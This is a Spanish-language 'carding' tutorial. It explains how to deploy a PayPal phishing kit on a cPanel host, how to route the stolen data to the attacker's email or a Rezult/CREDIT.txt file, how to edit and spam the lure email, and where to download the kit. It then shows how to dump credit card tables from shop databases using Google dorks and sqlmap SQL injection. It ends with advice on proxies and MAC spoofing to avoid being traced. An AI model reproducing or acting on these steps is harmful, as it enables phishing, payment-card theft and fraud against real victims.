Documente Academic
Documente Profesional
Documente Cultură
ataque
Últimamente se esta poniendo muy de moda el tema de el " Carding"" a nivel de todo latino
América, no hay que ser un profesional ni siquiera un "Hacker" como dicen muchos por
concepto erróneo de este tipo de método , ya que eh visto a muchas personas que nisiquiera
saben hacer un simple " ByPass" or Sql inyeccion metodo POST en los risk entre otros
payloads de una simple herramienta como "Sqlmap" o ni muchos menos saben utilizar
"Mfsconsole", digo esto porque es la realidad y soy de las personas que digo las cosas
como son .
Antes de comenzar los métodos de ataque de este escenario , quiero aclarar que no enseñare
a utilizar un proxy u algo, ya que ese post lo tienen en mi "BLOG" , guerra revisada no
mata gente bueno sigamos :
Pasos :
Una ves obtenido estos dos requisitos, vamos a subir nuestro scam mediatnte el "upload"
del Cpanel en la opcion " cargar " debemos comprimir nuestro scam en extension " .zip "
para que lo descomprima sin ningun problema luego de ello una vez subido nuestro scam :
Una vez subido como vemos en la imagen nosotros editaremos el archivo " Email.php " y
nos saldra este codigo :
<?
$send = "youemail@hotmail.com"; ///////////// CHANGE YOUR EMAIL OK.
?>
nosotros en la parte del correo electronico le pondremos nuestro correo para que llege los
datos de las personas, pero no creen que seria algo un poco cursi ? tanto si nos rastrean los
datos de envios u otro, bueno perfecto este scam tambien tiene la opcion de guardar los
datos en .TXT en la misma we de manera automatica sin modificar nada sigamos.
Les aconsejo que suban el Mailer.php en un servidor aparte , que no este en el mismo
servidor del scam ya que el mailer puede ser quemado facilmente.
Aqui es donde entra en funcion el " Letter " , el Letter no es mas que un archivo
contenedor del codigo fuente del mensaje que paypal deja en los correos electronicos de los
usuarios para una seria de procesos en la cuenta del usuario :
Antes de pegar el codigo del lettler debemos modificar algunas cosas por ejemplo el link
de la web
donde se direccionara el mensaje en este caso la web de nuestro "Scam "
View Source :
<html>
<body>
<p>
<a href="http://yourdomaine.com"><img alt=""
src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
</body>
</html>
--------------------------------------------------------------------------------------------------------------
-----------
Source Edit :
<html>
<body>
<p>
<a href="http://ejemploscam.com/hi"><img alt=""
src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
</body>
</html>
Una ves modificado correctamente llenaremos los datos del email.php , para spamear los
correos electronicos :
Requito :
luego de ello la victima caera en nuestra trampa y pondra los datos de su tarjeta de credito
y su cuenta de paypal en esta seccion de aqui :
Luego que la victima aya puesto todos sus datos y aceptado en las opciones de continuar,
automaticamente se guardara el registro y se creara una carpeta en nuestro scam llamada
Rezult/CREDIT.txt mas el archivo donde se almacenaran los datos de la tarjeta de credito .
Link de descarga de todo lo utilizado en este proceso :
http://www.mediafire.com/download/d9ep6so990ywc01/Scam+Paypal+2014+%2B+Mailer+%2B+Letller.rar
DUMPEO DE CCV
el dumpeo de las datos de una tarjeta , no es mas que una inyeccion SQL mediante una
herramienta como sqlmap o havij , ya que solo extraeremos los datos que almacene la DB .
Quizas el metodo de hallar es utilizando las "dorks" de google ya que la mayoria las usa
para este tipo de ataque de algunas dork especialmente de Carding ,en este proceso de
ataque es algo comun pero este nos dara $ $ $ .
1. http://www.localhost.com/category.php?cat_id=1
Una ves extraido la base de datos " la mayoria de tarjetas de credito se encuentren en las
Tablas "Orders" o " Shopping_cart " se encuentran los datos de las CCV
Database: db309014570
[15 tables]
+-----------------------+
| categories |
| contents |
| login |
| orders |
| orders_temp |
| ordersp |
| ordersp_temp |
| products |
| resale |
| resale_temp |
| shopping_cart_info |
| shoppingcart |
| user_credit_cart_info |
| users |
| users_wishlist |
+-----------------------+
Aver entraremos en la tabla " shopping_cart_info " y veamos que nos arroja :
como vemos no ah dado informacion sobre los datos de las CCV , pero si se fijan hay mas
tablas donde puede aver mas informacion para sacarle mas jugo a todo ese dinero $ $ $
entraremos a la tabla " users ", ya que estos usuarios registran su datos para poder comprar
productos de la web la cual nos hace tener acceso a este sitio 100 % cardeable tanto de
extraccion como para realizar nuestras compras aqui mismo.
como vemos esta web es cardeable internamente, bueno sin mas que decir me despito ante
ustedes se me olvida decirles algo , al momento de dumpear y comprar productos les
aconsejo uilizar siempre un proxy Socks5 Premium , quizas uno podra decir vaya protego
mi IP y listo, pero no mis queridos amigos(a) , la mac juega un rol importante en el soporto
de un ordenador de la misma empresa, ya que es su numero de " SERIE" y pocos le toman
importancia a ello les dejare una herramienta "Premium" para cambiar nuestra Mac de
manera manual :